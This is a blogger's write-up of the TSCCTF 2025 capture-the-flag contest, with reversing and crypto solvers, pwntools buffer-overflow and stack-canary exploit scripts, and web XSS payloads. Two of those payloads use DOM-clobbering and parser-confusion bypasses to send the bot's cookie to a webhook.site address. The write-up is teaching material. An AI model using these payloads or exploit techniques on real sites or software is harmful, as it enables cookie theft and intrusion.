I need to use VPN (and maybe it connects to Taiwan) to solve challenges in this CTF.
Last week just like in previous writeup, I open CTFTime and register to TSCCTF 2025 to do some CTF for fun.
If you want to skip the intro, just jump using this table of content. You can also find my other CTF writeup under CTF tag.
This CTF is unusual. The event is on weekday instead of weekend and it is individual competition instead of team competition.
Because it's on weekend, I am solving most of the challenge at night. The no team part is not problem for me, because I usually just do solo CTF.
Another interesting thing is to connect to some service in this CTF, we have to connect to the VPN that are provided by the organizer.

The first time I saw this, I am afraid that when I connect to this VPN they will steal my data. So, I try to only connect when I only need to access the challenge's service.
We are given the wireguard config and tutorial how to connect the VPN for windows only.
Tips for linux user to connect to VPN using wireguard config.
package or something equivalent on your distro. -
Place your wireguard config to
. -
Make sure you have the correct permissions of that directory.
sudo chown root:root -R /etc/wireguard && sudo chmod 600 -R /etc/wireguard
To connect the VPN, you can use this command.
wg-quick up <config-name>
And to disconnect, you can use this command.
wg-quick down <config-name>
For example if your config file is vpn.conf
, you can connect and disconnect
using command wg-quick up vpn
and wg-quick down vpn
Aside from this VPN shenanigan, I do well in this CTF. I solve 13 challenges (2023 points) and get 24th place.
And bellow is my writeup for this CTF. Enjoy!
These are just free flags in this category.
Give you a free flag
Score: 50 (417 Solves)
這裡據說藏了個 Flag
Author: Ruki
Just highlight the hidden text in the description to get the flag.
Please Join Our Discord!!!
Score: 50 (261 Solves)
想要我的 Flag 嗎?想要的話就送給你吧!自己去找吧,我把它埋藏在那裡了 於是...許多人爭相前往「TSCCTF Discord」,並追逐著這個夢想 所以,當時的年代可以說是一個「大資安時代」!
Author: 哥爾·D·Kazma
Join their discord and find the flag in the announcement channel description.
Feedback Form
Please fill out feedback form. Thank you!
Score: 50 (110 Solves)
Fill out the feedback form and get the flag at the end.
I only solve the easy challenges in this category. As a heads up, I rename some of the variable and function name in ghidra so it is easier to read.
Score: 50 (146 Solves)
Auth: Ruki
file: main.exe
Let's open this file in ghidra. You will find this function if you search flag

You can see that this function take data from _flag_encrypted
, do some xor
operation, and print the decrypted flag.
Let's see the _flag_encrypted

Now we can just make python program with the same data and function.
enc = [0xfe, 0xf9, 0xe9, 0xd1, 0xe3, 0xf5, 0xfe, 0xc2, 0xc3, 0xc4, 0xc1, 0xf5, 0xd3, 0xc5, 0xdf, 0xf5, 0xec, 0xc3, 0xd2, 0xf5, 0x98, 0xc5, 0xc7, 0xcf, 0xf5, 0x99, 0xd8, 0xd8, 0xc5, 0xd8, 0xd7] flag = ''.join([chr(e ^ 0xaa) for e in enc]) print(flag)
Chill Checker
Score: 50 (115 Solves)
Just Reverse and Chill.
Author: Kazma
file: chill
Let's open this file in ghidra and we can see the main function.

We can see that this program gets input
and then do something with it using
function 8 times. After that input
is compared with
and if both are same, we get the flag from generate_flag
Now let's see what complex_function

We can see that this function receive param_1
and param_2
. From main
function we know that param_1
is a character from our input
and param_2
index of the character plus 8. This function is basically just do character
shifting by its index plus 8.
Now we have this information, we need to find string to input and it become the
same as target
after doing the complex_function
8 times. Here is the code.
target = [0x53, 0x47, 0x5a, 0x49, 0x59, 0x49, 0x48, 0x57] s = "" for i in range(len(target)): c = ((target[i] - 65) - (i+8)*31) % 26 + 65 assert 64 < c < 91 s += chr(c) print(s)
Then we can pipe this function output to the chill
program input to get the
Gateway to the Reverse
Score: 50 (92 Solves)
都 2025 年了,除了 IDA & Ghidra 你還會什麼逆向工具!?
Author: Kazma
file: gate
Let's open this file in ghidra and see the main function.

We can see the input
is compared with target
and target
itself is passed
to function something
Now let's see something

We see that the final value of target
is obtained from xor operation with
. We can get the data
from main function.
Here is the code.
target = [0x4e, 0x4c, 0x3d, 0x72, 0x6a, 0x65, 0x2b, 0x66, 0x53, 0x26, 0x65, 0x56, 0x50, 0x21, 0x52, 0x64, 0x4b, 0x7f, 0x3d, 0x65, 0x3b, 0x7b, 0x79, 0x36, 0x43, 0x47, 0x34, 0x41, 0x69, 0x66] flag = ''.join([chr((target[i] ^ (i + 1)) + 5) for i in range(len(target))]) print(flag)
I only solve two easiest crypto challenges.
Very Simple Login
Score: 50 (144 Solves)
nc 36900
Author : Curious
file: server.py
First, let's see the main
function of this server.
def main(): key = os.urandom(32) for _ in range(32): choice = menu() if choice == 1: username = input('Username > ') try: token = register(username, key) except Exception: print('Username Error !', end='\n\n') continue print(f'Token : {token.hex()}', end='\n\n') if choice == 2: token = bytes.fromhex(input('Token > ')) try: username = login(token, key) except Exception: print('Token Error !', end='\n\n') if username == 'Admin': print(f'FLAG : {FLAG}', end='\n\n') sys.exit() else: print('FLAG : TSC{???}', end='\n\n') if choice == 3: sys.exit()
We can get the flag if we login with token that contains username Admin
If you read the whole program, there is not something that prevent us to
register username Admin
and use its token to login.

Score: 50 (130 Solves)
The classics never fade.
Author : freddy
file: share.tgz
We've got two files chal.py
and flag
, let's see the chal.py
import os import string import secrets flag = os.getenv("FLAG") or "TSC{test_flag}" charset = string.digits + string.ascii_letters + string.punctuation A, B = secrets.randbelow(2**32), secrets.randbelow(2**32) assert len(set((A * x + B) % len(charset) for x in range(len(charset)))) == len(charset) enc = "".join(charset[(charset.find(c) * A + B) % len(charset)] for c in flag) print(enc)
We can see that this program is doing some kind of character replacement of
to enc
with this formula.
Where is length of charset
, is value of charset.find(flag[i])
and are random value. We can then convert value of to enc[i]
First we need to find the value of and . We know that the prefix of the
flag is TSC{
. So we know the value of and are using character T
and S
respectively. Now we have these equations.
Then we can subtract these two equation.
We know that because character T
and S
are next to each
other and their difference is . So now we get the value of .
Now we can get back the value of .
Now we know the value of and , we can reverse the formula above.
with is invese modulo of .
Here is the code, the variables might be a little different from some notation above.
import string charset = string.digits + string.ascii_letters + string.punctuation M = len(charset) enc = open("./flag", "r").read().strip() f0 = charset.find('T') e0 = charset.find(enc[0]) f1 = charset.find('S') e1 = charset.find(enc[1]) assert f0 - f1 == 1 A = (e0 - e1) % M B = (e0 - (f0 * A)) % M flag = ''.join([charset[((charset.find(e) - B) * pow(A, -1, M)) % M] for e in enc]) print(flag)
All of pwn challenges that I solve are just some kind of simple buffer overflow exploit.
Score: 50 (152 Solves)
Auth: Ruki
nc 1337
file: main.cpp
Let's see what's inside main.cpp
#include <string.h> #include <iostream> #include <stdio.h> using namespace std; void jackpot() { char flag[50]; FILE *f = fopen("/home/gamble/flag.txt", "r"); if (f == NULL) { printf("錯誤:找不到 flag 檔案\n"); return; } fgets(flag, 50, f); fclose(f); printf("恭喜你中了 777 大獎!\n"); printf("Flag 是:%s", flag); } struct GameState { char buffer[20]; char jackpot_value[4]; } game; void spin() { strcpy(game.jackpot_value, "6A6"); printf("輸入你的投注金額:"); gets(game.buffer); printf("這次的結果為:%s\n", game.jackpot_value); if (strcmp(game.jackpot_value, "777") == 0) { jackpot(); } else { printf("很遺憾,你沒中獎,再試一次吧!\n"); } } int main() { setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); printf("歡迎來到拉霸機!試著獲得 777 大獎吧!\n"); spin(); return 0; }
We can see that to get the flag, we need to call jackpot
function. We can call
this function if value of game.jackpot_value
is 777
. But this program only
received input and store it to game.buffer
We can see that this program uses gets(game.buffer)
without checking any guard
of possible buffer overflow in game.buffer
. So we can just give input
(string of character 7
with length 23).
The first 20 characters will fill up game.buffer
and then the next 3
characters will overflow and rewrite the value of game.jackpot_value
to 777

Score: 310 (27 Solves)
This is my stack implementation for data structure course's homework I. I enabled all protections so it should be safe, right?
Author: pwn2ooown
nc 11100
file: localstack.zip
We are given the source code file of this challenge.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #define MAX_STACK_SIZE 20 #define MAX_INPUT_SIZE 25 void print_flag() { char flag[64]; FILE *f = fopen("flag", "r"); if (f == NULL) { perror("fopen"); exit(1); } fgets(flag, sizeof(flag), f); printf("%s",flag); fclose(f); } int main() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); char input[25]; char command[25]; int64_t stack[MAX_STACK_SIZE]; int64_t top = -1; int64_t value; puts("Commands: 'push <value>', 'pop', 'show', 'help', or 'exit'"); while (1) { printf(">> "); fgets(input, sizeof(input), stdin); sscanf(input, "%s", command); if (strcmp(command, "push") == 0) { if (sscanf(input, "%*s %ld", &value) == 1) { stack[++top] = value; printf("Pushed %ld to stack\n", value); } else { printf("Invalid push.\n"); } } else if (strcmp(command, "pop") == 0) { printf("Popped %ld from stack\n", stack[top--]); } else if (strcmp(command, "show") == 0) { printf("Stack top: %ld\n", stack[top]); } else if (strcmp(command, "exit") == 0) { break; } else if (strcmp(command, "help") == 0) { puts("Commands: 'push <value>', 'pop', 'show', 'help', or 'exit'"); } else { printf("Unknown command: %s\n", command); } } return 0; }
We can get the flag in function print_flag
. So we have to do some kind of
bufferoverflow to overwrite the program stack and jump to that function.
Let's checksec the binary.

All security is enabled, it means we can't just do buffer offerflow and
overwrite the stack to jump to print_flag
Let's look again the main
function. We see that there is no guard for the
variable. So when we do push
or pop
operation, the top
value can be
negative or exceed MAX_STACK_SIZE
. It means we can access another values
outside the stack
array. Let's check another values before the `stack.
from pwn import * chall = "./localstack" p = process(chall) p.recvline().decode() n = 29 for i in range(n): p.recvuntil(b">> ") p.sendline(b"pop") r = p.recvline().decode().strip().split() v = int(r[1]) print(hex(v))

We can see the third output value 0x5584cde279f
, this is some address value in
our program. We will save this value to do some relative address manipulation
later. Also, we can see that the last output value 0x3f9156898fd5a700
is the
You can check and compare those value using gdb.
from pwn import * context.arch = 'amd64' context.os = 'linux' context.terminal = ["kitty"] # change to your own terminal chall = "./localstack" # p = process(chall) p = gdb.debug(chall, gdbscript=''' break main continue ''') p.recvline().decode() n = 30 for i in range(n): p.recvuntil(b">> ") p.sendline(b"pop") r = p.recvline().decode().strip().split() v = int(r[1]) print(hex(v))

The exact position of the canary value may be different. You can change variable
n = 29
and do trial and error until you found the canary value.
Now we know the canary value, we then check how many value can we push to the
until it hits the canary check. After some trial and error we got the
value of n = 30
from pwn import * chall = "./localstack" p = process(chall) p.recvline().decode() n = 30 for i in range(n): payload = f"push {i}" p.recvuntil(b">> ") p.sendline(payload.encode()) p.recvline() p.recvuntil(b">> ") p.sendline(b"exit") p.interactive()

We got hit by stack smashing error, it means the 30th value of stack
is the
Next we need to find the distance between the canary to return address in the stack. After some trial and error, we found that there is one stack distance between the canary and the target address. Also we make sure that the position of the canary on the remote server using the same way above. And here is our final code.
from pwn import * chall = "./localstack" # p = process(chall) p = remote("", 11100) known_addr = 0x149f known_target = 0x1289 p.recvline().decode() vals = [] # Find the relative address and canary value # n = 29 n = 31 for i in range(n): p.recvuntil(b">> ") p.sendline(b"pop") r = p.recvline().decode().strip().split() v = int(r[1]) vals.append(v) canary = vals[-1] print(hex(canary)) assert(canary >= 0) addr_diff = known_addr - known_target cur_addr = vals[2] cur_target = cur_addr - addr_diff assert len(vals) == n # Put back the values we pop before for i in range(n): v = vals.pop() payload = f"push {v}" p.recvuntil(b">> ") p.sendline(payload.encode()) p.recvline() # Push some values before the canary n = 29 for i in range(n): payload = f"push {i}" p.recvuntil(b">> ") p.sendline(payload.encode()) p.recvline() # Push the canary value payload = f"push {canary}" p.recvuntil(b">> ") p.send(payload.encode()) p.recvline() p.recvuntil(b">> ") p.sendline(b"push 0") p.recvline() payload = f"push {cur_target}" p.recvuntil(b">> ") p.sendline(payload.encode()) p.recvline() p.recvuntil(b">> ") p.sendline(b"exit") p.interactive()
We get known_addr
and known_target
by doing objdump of the binary. For
, we know that it always ends with 49f

Let's run the exploit.

Author: Kazma
nc 56001
file: bread.exe
We are given PE32+ executable file. First, let's open it with ghidra.

We can see that on main function, it is leaking the main
function address and
read the input without any buffer overflow guard.
Above the main function, we can see there is magic

We can execute cmd.exe
in this function.
We see that the parameters of this function is not relevant and we can jump
straight ahead to the WinExec
First, we must find the padding for our payload until it causes buffer overflow. If you are using linux, you can run this binary using wine.
This is how I debug this program to find how many character for the padding.
Run with
wine bread.exe
. -
In another terminal find the PID using
ps aux | grep bread.exe
. -
Then run
gdb -p <PID>
.If you get error
ptrace: Operation not permitted
, you must disableptrace_scope
using this command.echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
Don't forget to turn it on again later.
In gdb, add breakpoint on
using commandb *0x14000155c
.This is the address of
instruction in main function that I got from ghidra. For some reason the address does not change when I run the program locally.ret address in ghidra -
Back to the first terminal, enter some input to check the overflow. In this case, try to input 60 characters of
. -
Continue the program in gdb. It will hit breakpoint before
instruction is executed.

We can see that the last four a
character and two newline character is now the
main function return address. So now we know that the padding will be 56
characters long.
Now we know our padding and leaked main address, we can get the relative address by knowing the main address and target address from our program locally.

We see that the value for main address and target address are 0x1400014db
So, here is the exploit code.
from pwn import * # p = process(["wine", "./bread.exe"]) p = remote("", 56001) r = p.recvline_contains(b"Something important").decode() addr = r[r.find('0'):r.find('0')+16] print(addr) known_main = 0x1400014db known_target = 0x1400014bc addr_diff = known_main - known_target main_addr = int(addr, 16) target_addr = main_addr - addr_diff payload = b"a" * 56 + p64(target_addr) print(p.recvline_contains(b"flag?").decode()) p.sendline(payload) p.interactive()
For some reason, maybe there is some kind of encoding error that cause some
cryptid output in my terminal. Maybe because difference of windows on the remote
and my local terminal on linux. With some luck, I guess the file is flag.txt
and try to read it.

I only solve two web challenges and both are some kind of XSS exploit.
Score: 388 (21 Solves)
Just a book site, you can create your own boook and share it to admin!
Author: Vincent55
file: book-shared.zip
We are given some kind of note sharing website. If we search flag
in the
challenge source code given, we can see that the flag is file bot/bot.js
. The
flag is assigned to the bot's browser cookie and we need to steal that cookie
when the bot visits our note.
Inside file app/templates/book.html
, we can see this code.
<body> <div class="book-container"> <h1 class="book-title" id="title"></h1> <div class="book-content" id="content"></div> <div class="nav-links"> <a href="{{ url_for('index') }}">📚 Return to Index</a> </div> </div> <script> document.addEventListener("DOMContentLoaded", () => { const urlParams = new URLSearchParams(window.location.search); const title = atob(urlParams.get("title")); const content = atob(urlParams.get("content")); document.getElementById("title").innerHTML = DOMPurify.sanitize(title); if (typeof config !== "undefined" && config.DEBUG) { document.getElementById("content").innerHTML = content; } else { document.getElementById("content").innerHTML = DOMPurify.sanitize(content); } }); </script> </body>
We can see that to do some XSS, we have to bypass the guard
if (typeof config !== "undefined" && config.DEBUG)
Variable config
is some kind of global object in browser. Now how can we
change that?
I found out about DOM Clobbering exploit. Basically we can manipulate the DOM and change the behavior of javascript on the page. We are "clobbering" the global variable and overwriting it with the DOM.
Now we know that we need to make the variable config.DEBUG
to be truthy. We
can find collections of the DOM Clobering payload from here. We
will use this payload for the title and change config.DEBUG
value on the page.
<form id="config"><button id="DEBUG"></button></form>
We can check in the console that value of config.DEBUG
is already changed.

Now we successfully bypass this guard, next we can just do the XSS. We set up a webhook from this site to capture our fetch request. The we can fill the content with this payload to get the cookie on the page and send it to our webhook.
<img src="x" onerror='fetch("https://webhook.site/<webhook-id>/?cookie=" + document.cookie)' />
We can't directly use the <script>
tag because DOM purify will remove it. So,
we use onerror
attribute to call the fetch
function instead.
Don't forget to submit the page url in /report
page and wait the bot to visit.

Beautiful World
Score: 409 (19 Solves)
What a wonderful and beautiful world for frontend
Author: Vincent55
file: world-shared.zip
We are given another kind of note sharing app. Just like the book challenge
before, the flag is in file bot/bot.js
and we have to steal it.
First, open file app/main.py
and we can see this code.
@app.route("/note", methods=["GET"]) def view_note(): """View a note""" content = base64.urlsafe_b64decode(request.args.get("content", "")).decode() # Check if the content is harmful content or not with BeautifulSoup. soup = BeautifulSoup(content, "html.parser") if sum(ele.name != 's' for ele in soup.find_all()): return "no eval tag." if sum(ele.attrs != {} for ele in soup.find_all()): return "no eval attrs." return render_template("note.html", note=content)
Our note is parsed using BeautifulSoup and it only allows <s>
html tag without
any attribute.
Next, we see the code in app/templates/note.html
<body> <h1>🌞 Beautiful World - View</h1> <s>a beautiful world is full of strikethrough.</s> {% autoescape false %} <div>{{ note }}</div> {% endautoescape %} <a href="{{ url_for('index') }}">Back to Pages</a> </body>
The jinja autoescape is turn off in this template, so we can do XSS exploit here
freely. Now our task is just bypass the check on only allow <s>
I found this writeup and found out we can use this payload and BeautifulSoup will parse it as html comment, but jinja will parse it as valid html tag.
Now we can use <script>
tag to get the flag and send it to our webhook like
book challenge before.
<!--> <script> fetch("https://webhook.site/<webhook-id>/?cookie=" + document.cookie); </script> -->
We submit the note and... it fails. We check the network and console and see this.

We check again in app/templates/note.html
, there is this code in the header.
<meta http-equiv="Content-Security-Policy" content="connect-src 'self';" />
There is this CSP rule that only allows connecting to its own domain. How do we
bypass this? We can just create <img>
that request to our webhook.
<!--> <script> img = document.createElement("img"); img.src = "https://webhook.site/<webhook-id>/?cookie=" + document.cookie; document.body.appendChild(img); </script> -->
Then we submit our note on /report
page and wait for request to our webhook.

Overall I enjoy this CTF especially the pwn challenges and web challenges. Maybe I could invest more time to solve more challenges if this CTF was on the weekend.
I have only two criticisms. First, it's annoying to use VPN to connect to the challenge's service. Second, some of the description and challenges are onlt in chinese/mandarin. Maybe because this CTF is mainly for Taiwan parcipant so they didn't use English as main language. I already submit about this to their feedback form and hopefully next year it will be better.
It was a fun CTF and also I get 24th place. Not too bad just for casual attempt.
I hope you enjoy this writeup. See you next time!